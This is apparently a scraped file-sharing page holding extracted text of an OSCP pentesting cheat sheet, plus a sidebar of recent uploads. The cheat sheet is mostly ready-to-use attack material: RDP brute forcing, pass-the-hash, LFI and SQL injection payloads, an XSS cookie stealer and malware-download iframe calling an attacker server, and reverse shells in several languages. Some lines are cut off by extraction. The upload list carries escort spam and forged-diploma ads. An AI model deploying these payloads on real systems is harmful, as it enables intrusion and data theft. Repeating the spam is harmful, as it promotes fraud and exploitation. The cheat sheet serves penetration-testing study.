Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
 
High Availability With DRBD & Heartbeat
High Availability With DRBD & HeartbeatHigh Availability With DRBD & Heartbeat
High Availability With DRBD & Heartbeat
 
3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pub3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pub
 
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
 
Linux Tracing Superpowers by Eugene Pirogov
Linux Tracing Superpowers by Eugene PirogovLinux Tracing Superpowers by Eugene Pirogov
Linux Tracing Superpowers by Eugene Pirogov
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
 
Hands on Virtualization with Ganeti
Hands on Virtualization with GanetiHands on Virtualization with Ganeti
Hands on Virtualization with Ganeti
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
 

Recently uploaded

RA-11058_IRR-COMPRESS Do 198 series of 1998
RA-11058_IRR-COMPRESS Do 198 series of 1998RA-11058_IRR-COMPRESS Do 198 series of 1998
RA-11058_IRR-COMPRESS Do 198 series of 1998YohFuh
 
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdfKantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdfSocial Samosa
 
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptx
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptxEMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptx
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptxthyngster
 
Predictive Analysis - Using Insight-informed Data to Determine Factors Drivin...
Predictive Analysis - Using Insight-informed Data to Determine Factors Drivin...Predictive Analysis - Using Insight-informed Data to Determine Factors Drivin...
Predictive Analysis - Using Insight-informed Data to Determine Factors Drivin...ThinkInnovation
 
Indian Call Girls in Abu Dhabi O5286O24O8 Call Girls in Abu Dhabi By Independ...
Indian Call Girls in Abu Dhabi O5286O24O8 Call Girls in Abu Dhabi By Independ...Indian Call Girls in Abu Dhabi O5286O24O8 Call Girls in Abu Dhabi By Independ...
Indian Call Girls in Abu Dhabi O5286O24O8 Call Girls in Abu Dhabi By Independ...dajasot375
 
VIP High Profile Call Girls Amravati Aarushi 8250192130 Independent Escort Se...
VIP High Profile Call Girls Amravati Aarushi 8250192130 Independent Escort Se...VIP High Profile Call Girls Amravati Aarushi 8250192130 Independent Escort Se...
VIP High Profile Call Girls Amravati Aarushi 8250192130 Independent Escort Se...Suhani Kapoor
 
{Pooja: 9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...
{Pooja: 9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...{Pooja: 9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...
{Pooja: 9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...Pooja Nehwal
 
Customer Service Analytics - Make Sense of All Your Data.pptx
Customer Service Analytics - Make Sense of All Your Data.pptxCustomer Service Analytics - Make Sense of All Your Data.pptx
Customer Service Analytics - Make Sense of All Your Data.pptxEmmanuel Dauda
 
办理(Vancouver毕业证书)加拿大温哥华岛大学毕业证成绩单原版一比一
办理(Vancouver毕业证书)加拿大温哥华岛大学毕业证成绩单原版一比一办理(Vancouver毕业证书)加拿大温哥华岛大学毕业证成绩单原版一比一
办理(Vancouver毕业证书)加拿大温哥华岛大学毕业证成绩单原版一比一F La
 
How we prevented account sharing with MFA
How we prevented account sharing with MFAHow we prevented account sharing with MFA
How we prevented account sharing with MFAAndrei Kaleshka
 
Brighton SEO | April 2024 | Data Storytelling
Brighton SEO | April 2024 | Data StorytellingBrighton SEO | April 2024 | Data Storytelling
Brighton SEO | April 2024 | Data StorytellingNeil Barnes
 
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsapps
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /WhatsappsBeautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsapps
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsappssapnasaifi408
 
Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024thyngster
 
办理学位证中佛罗里达大学毕业证,UCF成绩单原版一比一
办理学位证中佛罗里达大学毕业证,UCF成绩单原版一比一办理学位证中佛罗里达大学毕业证,UCF成绩单原版一比一
办理学位证中佛罗里达大学毕业证,UCF成绩单原版一比一F sss
 
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.pptdokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.pptSonatrach
 
代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改
代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改
代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改atducpo
 
Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)
Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)
Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)jennyeacort
 

Recently uploaded (20)

RA-11058_IRR-COMPRESS Do 198 series of 1998
RA-11058_IRR-COMPRESS Do 198 series of 1998RA-11058_IRR-COMPRESS Do 198 series of 1998
RA-11058_IRR-COMPRESS Do 198 series of 1998
 
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdfKantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
 
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptx
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptxEMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptx
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptx
 
Predictive Analysis - Using Insight-informed Data to Determine Factors Drivin...
Predictive Analysis - Using Insight-informed Data to Determine Factors Drivin...Predictive Analysis - Using Insight-informed Data to Determine Factors Drivin...
Predictive Analysis - Using Insight-informed Data to Determine Factors Drivin...
 
Indian Call Girls in Abu Dhabi O5286O24O8 Call Girls in Abu Dhabi By Independ...
Indian Call Girls in Abu Dhabi O5286O24O8 Call Girls in Abu Dhabi By Independ...Indian Call Girls in Abu Dhabi O5286O24O8 Call Girls in Abu Dhabi By Independ...
Indian Call Girls in Abu Dhabi O5286O24O8 Call Girls in Abu Dhabi By Independ...
 
VIP High Profile Call Girls Amravati Aarushi 8250192130 Independent Escort Se...
VIP High Profile Call Girls Amravati Aarushi 8250192130 Independent Escort Se...VIP High Profile Call Girls Amravati Aarushi 8250192130 Independent Escort Se...
VIP High Profile Call Girls Amravati Aarushi 8250192130 Independent Escort Se...
 
{Pooja: 9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...
{Pooja: 9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...{Pooja: 9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...
{Pooja: 9892124323 } Call Girl in Mumbai | Jas Kaur Rate 4500 Free Hotel Del...
 
Customer Service Analytics - Make Sense of All Your Data.pptx
Customer Service Analytics - Make Sense of All Your Data.pptxCustomer Service Analytics - Make Sense of All Your Data.pptx
Customer Service Analytics - Make Sense of All Your Data.pptx
 
办理(Vancouver毕业证书)加拿大温哥华岛大学毕业证成绩单原版一比一
办理(Vancouver毕业证书)加拿大温哥华岛大学毕业证成绩单原版一比一办理(Vancouver毕业证书)加拿大温哥华岛大学毕业证成绩单原版一比一
办理(Vancouver毕业证书)加拿大温哥华岛大学毕业证成绩单原版一比一
 
How we prevented account sharing with MFA
How we prevented account sharing with MFAHow we prevented account sharing with MFA
How we prevented account sharing with MFA
 
Brighton SEO | April 2024 | Data Storytelling
Brighton SEO | April 2024 | Data StorytellingBrighton SEO | April 2024 | Data Storytelling
Brighton SEO | April 2024 | Data Storytelling
 
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsapps
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /WhatsappsBeautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsapps
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsapps
 
Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Defence Colony Delhi 💯Call Us 🔝8264348440🔝
 
VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...
VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...
VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...
 
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024
Consent & Privacy Signals on Google *Pixels* - MeasureCamp Amsterdam 2024
 
Decoding Loan Approval: Predictive Modeling in Action
Decoding Loan Approval: Predictive Modeling in ActionDecoding Loan Approval: Predictive Modeling in Action
Decoding Loan Approval: Predictive Modeling in Action
 
办理学位证中佛罗里达大学毕业证,UCF成绩单原版一比一
办理学位证中佛罗里达大学毕业证,UCF成绩单原版一比一办理学位证中佛罗里达大学毕业证,UCF成绩单原版一比一
办理学位证中佛罗里达大学毕业证,UCF成绩单原版一比一
 
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.pptdokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
 
代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改
代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改
代办国外大学文凭《原版美国UCLA文凭证书》加州大学洛杉矶分校毕业证制作成绩单修改
 
Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)
Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)
Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)
 

Pentesting111111 Cheat Sheet_OSCP_2023.pdf

  • 1. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 1 of 28 https://md2pdf.netlify.app/ Pentest-Cheat-Sheets This repo has a collection of snippets of codes and commands to help our lives! The main purpose is not be a crutch, this is a way to do not waste our precious time! This repo also helps who trying to get OSCP. You'll find many ways to do something without Metasploit Framework. Ninja Tricks Recon DNS SPF Nmap NetCat SNMP Mysql MS SQL Web Enumeration Exploitation System Network RDP Pass The Hash
  • 2. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 2 of 28 https://md2pdf.netlify.app/ Windows-Shell Web Application Web Remote Code Execution LFI encode XSS SQLi sqlmap Bare Hands Jekins Post-exploitation Reverse Shell PHP Reverse Shell Perl Reverse Shell python Reverse Shell Ruby Reverse Shell bash Reverse Shell powershell Reverse Sheel Java Reverse Sheel Xterm Reverse Sheel Linux Linux Privilege Escalation Data Haversting and Enumeration Linux Pivot Sshutle VPNPivot SSH Tunneling Linux Backdoring Windows Windows Enumeration Windows Privilege Escalation Hashdump Transferring Files Without Metasploit
  • 3. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 3 of 28 https://md2pdf.netlify.app/ Backdoring Windows Pivot Openssh for Tunneling Plink Resources HTTP/HTTPS Servers Wordlist seclist cotse PacketStorm Default Passwords Default Passoword Router Password Leak Pastebin Tables Contribution Recon DNS Nslookup Resolve a given hostname to the corresponding IP. nslookup targetorganization.com Reverse DNS lookup nslookup -type=PTR IP_address MX(Mail Exchange) lookup
  • 4. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 4 of 28 https://md2pdf.netlify.app/ nslookup -type=MX domain Zone Transfer Using nslookup Command nslookup server domain.com ls -d domain.com Using HOST Command host -t ns(Name Server) < domain > host -t ns domain.com after that test nameservers host -l < domain > < nameserver > host -l domain.com ns2.domain.com Nmap Dns Enumaration nmap -F --dns-server <dns server ip> <target ip range> Auto tools DNSenum dnsenum targetdomain.com dnsenum --target_domain_subs.txt -v -f dns.txt -u a -r targetdomain.com
  • 5. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 5 of 28 https://md2pdf.netlify.app/ DNSmap targetdomain.com dnsmap targetdomain.com -w <Wordlst file.txt> Brute Force, the file is saved in /tmp dnsmap targetdomain.com -r DNSRecon DNS Brute Force dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml Fierce.pl fierce -dns targetdomain.com HostMap hostmap.rb -only-passive -t <IP> We can use -with-zonetransfer or -bruteforce-level SPF Recon Dig SPF txt dig txt target.com Dmarc
  • 6. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 6 of 28 https://md2pdf.netlify.app/ dig TXT _dmarc.example.org Online Tools https://dnsdumpster.com/ https://network-tools.com/nslook/ https://www.dnsqueries.com/en/ https://mxtoolbox.com/ Nmap Set the ip address as a varible export ip=192.168.1.100 export netw=192.168.1.0/24 Detecting Live Hosts Only Ip's nmap -sn -n $netw | grep for | cut -d" " -f5 Stealth Scan nmap -sS $ip Only Open Ports and Banner Grab nmap -n -Pn -sS $ip --open -sV Stealth scan using FIN Scan map -sF $ip
  • 7. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 7 of 28 https://md2pdf.netlify.app/ Agressive scan Without Ping scan, no dns resolution, show only open ports all and test All TCP Ports nmap -n -Pn -sS -A $ip --open -p- Nmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and scripts against services nmap –v –sS –A –T4 $ip OS FigerPrint nmap -O $ip Quick Scan nmap -T4 -F $netw Quick Scan Plus nmap -sV -T4 -O -F --version-light $netw output to a file nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip output to a file Plus nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw Search NMAP scripts
  • 8. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 8 of 28 https://md2pdf.netlify.app/ ls /usr/share/nmap/scripts/ | grep ftp Nmap Discovery NetCat Port Scanner One port nc -nvz 192.168.1.23 80 Port Range nc -vnz 192.168.1.23 0-1000 Send files Server nc -lvp 1234 > file_name_to_save Client nc -vn 192.168.1.33 1234 < file_to_send Executing remote script Server nc -lvp 1234 -e ping.sh <IP> Client
  • 9. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 9 of 28 https://md2pdf.netlify.app/ nc -vn 192.168.1.33 1234 Chat with encryption Server ncat -nlvp 8000 --ssl Client ncat -nv 192.168.1.33 8000 Banner Grabbing Request nc target port HTTP_Verb path http/version Host: url Response nc www.bla.com.br 80 HEAD / HTTP/1.0 Host: www.bla.com.br If this site uses https you need to use openssl penssl s_client -quiet www.bla.com.br:443 SNMP
  • 10. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 10 of 28 https://md2pdf.netlify.app/ Fixing SNMP output apt-get install snmp-mibs-downloader download-mibs echo "" > /etc/snmp/snmp.conf OneSixtyone onesixtyone -c COMMUNITY_FILE -i Target_ip onesixtyone -c community.txt -i Found_ips.txt snmpwalk Walking MIB's snmpwalk -c COMMUNITY -v VERSION target_ip snmpwalk -c public -v1 192.168.25.77 specific MIB node snmpwalk -c community -v version Target IP MIB Node Example: USER ACCOUNTS = 1.3.6.1.4.1.77.1.2.25 snmpwalk -c public -v1 192.168.25.77 1.3.6.1.4.1.77.1.2.25 snmp-check snmp-check -t target_IP | snmp-check -t TARGET -c COMMUNITY snmp-check -t 172.20.10.5 snmp-check -t 172.20.10.5 -c public
  • 11. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 11 of 28 https://md2pdf.netlify.app/ Automate the username enumeration process for SNMPv3 apt-get install snmp snmp-mibs-downloader NMAP SNMPv3 Enumeration nmap -sV -p 161 --script=snmp-info 172.20.10.0/24 Default Credentials /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt MYSQL Try remote default Root access Mysql Open to wild mysql -h Target_ip -u root -p MSSQL MSQL Information Gathering Web Enumeration wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-
  • 12. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 12 of 28 https://md2pdf.netlify.app/ Dirsearch dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old dirsearch -u https://target.com -e . dirb dirb http://target.com /path/to/wordlist Gobuster gobuster -u https://target.com -w /usr/share/wordlists/dirb/big.txt Exploitation System Network RDP xfreerdp Simple User Enumeration for Windows Target (kerberos based) xfreerdp /v:<target_ip> -sec-nla /u:"" dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlist dirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.
  • 13. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 13 of 28 https://md2pdf.netlify.app/ xfreerdp /v:192.168.0.32 -sec-nla /u:"" login xfreerdp /u: /g: /p: /v:<target_ip> xfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34 Wordlist based bruteforce NCRACK ncrack -vv --user/-U <username/username_wordlist> --pass/-P <password/password_wordlist> <target_ip>:3389 ncrack -vv --user user -P wordlist.txt 192.168.0.32:3389 Crowbar crowbar -b rdp <-u/-U user/user_wordlist> -c/-C <password/password_wordlist> -s <target_ip>/32 -v crowbar -b rdp -u user -C password_wordlist -s 192.168.0.16/32 -v Pass the hash Smb pass the hash Tool: pth-toolkit Listing shared folders sudo pth-smbclient --user= --pw-nt-hash -m smb3 -L <target_ip> <target_ip>
  • 14. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 14 of 28 https://md2pdf.netlify.app/ Interactive smb shell sudo pth-smbclient --user= --pw-nt-hash -m smb3 <target_ip>shared_folder Web Application Web Remote code LFI (Local File Inclusion) Situation http://<target>/index.php?parameter=value How to Test http://<target>/script.php?page=../../../../../../../../etc/passwd http://<target>/script.php?page=../../../../../../../../boot.ini LFI Payloads Payload All the Things Seclist LFI Intruder encode sudo pth-smbclient --user=user --pw-nt-hash -m smb3 -L 192.168.0.24 192.168.0 sudo pth-smbclient --user=user --pw-nt-hash -m smb3 192.168.0.24folder ljahdçj http://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=inde
  • 15. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 15 of 28 https://md2pdf.netlify.app/ XSS Reflected Simple test This is a simple test to see what happens, this is not a prove that the field is vuln to xss <plaintext> Simple XSS test <script>alert('Found')</script> "><script>alert(Found)</script>"> <script>alert(String.fromCharCode(88,83,83))</script> Bypass filter of tag script " onload="alert(String.fromCharCode(88,83,83)) " onload="alert('XSS') bla is not a valid image, so this cause an error <img src='bla' onerror=alert("XSS")> Persistent PHP collector >document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibili
  • 16. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 16 of 28 https://md2pdf.netlify.app/ > cookie.txt chmod 777 cookie.txt edit a php page like colector.php as follow: <?php $cookie=GET['cookie']; $useragent=$_SERVER['HTTP_USER_AGENT']; $file=fopen('cookie.txt', 'a'); fwrite($file,"USER AGENT:$useragent || COOKIE=$cookien"); fclose($file); ?> Script to put in page: Malware Donwloader via XSS <iframe src="http://OUR_SERVER_IP/OUR_MALWARE" height="0" width="0"></iframe> How to play Mario with XSS XSS payloads Payload All The Things Seclist XSS SQLI Sql Injection Sqlmap <scritp>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie; <iframe src="https://jcw87.github.io/c2-smb1/" width="100%" height="600"></iframe> <input onfocus="document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2
  • 17. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 17 of 28 https://md2pdf.netlify.app/ GET Error-Based Simple test Adding a simpe quote ' Example: http://192.168.1.104/Less-1/?id=5' List databases ./sqlmap.py -u http://localhost/Less-1/?id=1 --dbs List tables ./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name --tables List columns Dump all Set Cookie Checking Privileges ./sqlmap.py -u http://localhost/Less-1/?id=1 --privileges | grep FILE ./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name -T table_name --column ./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name -T table_name --dump-a ./sqlmap.py -u http://target/ovidentia/index.php?tg=delegat&idx=mem&id=1 --coo
  • 18. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 18 of 28 https://md2pdf.netlify.app/ Reading file ./sqlmap.py -u <URL> --file-read=<file to read> ./sqlmap.py -u http://localhost/Less-1/?id=1 --file-read=/etc/passwd Writing file ./sqlmap.py -u <url> --file-write=<file> --file-dest=<path> POST ./sqlmap.py -u <POST-URL> --data="<POST-paramters> " You can also use a file like with the post request: ./sqlmap.py -r post-request.txt -p uname Bare Hands GET Error-Based Simple test Adding a simpe quote ' ./sqlmap.py -u http://localhost/Less-1/?id=1 --file-write=shell.php --file-dest=/var ./sqlmap.py -u http://localhost/Less-11/ --data "uname=teste&passwd=&submit=Submit"
  • 19. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 19 of 28 https://md2pdf.netlify.app/ Example: http://192.168.1.104/Less-1/?id=5' Fuzzing Sorting columns to find maximum column http://192.168.1.104/Less-1/?id=-1 order by 1 http://192.168.1.104/Less-1/?id=-1 order by 2 http://192.168.1.104/Less-1/?id=-1 order by 3 (until it stop returning errors) Finding what column is injectable mysql http://192.168.1.104/Less-1/?id=-1 union select 1, 2, 3 (using the same amount of columns you got on the previous step) postgresql http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, NULL (using the same amount of columns you got on the previous step) one of the columns will be printed with the respective number Finding version mysql http://192.168.1.104/Less-1/?id=-1 union select 1, 2, version() postgres
  • 20. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 20 of 28 https://md2pdf.netlify.app/ http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, version() Finding database name mysql http://192.168.1.104/Less-1/?id=-1 union select 1,2, database() postgres http://192.168.1.104/Less-1/?id=-1 union select NULL,NULL, database() Finding usernames logged in mysql http://192.168.1.104/Less-1/?id=-1 union select 1, 2, current_user() Finding databases mysql http://192.168.1.104/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata postgres http://192.168.1.104/Less-1/?id=-1 union select 1, 2, datname from pg_database Finding table names from a database mysql postgres Finding column names from a table http://192.168.1.104/Less-1/?id=-1 union select 1, 2, table_name from information_sc http://192.168.1.104/Less-1/?id=-1 union select 1, 2, tablename from pg_tables where
  • 21. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 21 of 28 https://md2pdf.netlify.app/ mysql postgres Concatenate Example: http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login from users; http://192.168.1.104/Less-1/?id=-1 union select 1, 2, password from users; in one query http://192.168.1.104/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users; mysql http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login||':'||password from users; postgres Error Based SQLI (USUALLY MS-SQL) Current user http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))-- DBMS version http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))-- Database name http://192.168.1.104/Less-1/?id=-1 or db_name(0)=0 -- Tables from a database http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as http://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_s http://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_s
  • 22. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 22 of 28 https://md2pdf.netlify.app/ varchar(4096)) FROM dbname..sysobjects where xtype='U')-- http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))-- Columns within a table http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename')-- remember to change dbname and tablename accordingly with the given situation after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename' AND dbname..syscolumns.name NOT IN('previously found column name', ...))-- Actual data http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)-- after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename AND name NOT IN('previously found row data'))-- Shell commands EXEC master..xp_cmdshell <command> you need yo be 'sa' user
  • 23. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 23 of 28 https://md2pdf.netlify.app/ Enabling shell commands EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure 'xp_shell', 1; RECONFIGURE; Jenkins Post Exploitation Reverse Shell PHP Reverse Shell php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' Tiny Reverse Shell <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.36.167/1337 0>&1'"); Perl Reverse Shell Python Reverse Shell Ruby Reverse Shell perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobynam python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_ST ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%
  • 24. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 24 of 28 https://md2pdf.netlify.app/ Bash Reverse Shell bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Powershell Reverse Shell Create a simple powershell script called reverse.ps1: Java Reverse Shell Xterm Reverse Shell One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001. xterm -display 10.0.0.1:1 To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system): Xnest :1 You’ll need to authorise the target to connect to you (command also run on your host): function reverse_powershell { $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = } powershell -ExecutionPolicy bypass -command "Import-Module reverse.ps1; reverse_powe r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read li p.waitFor()
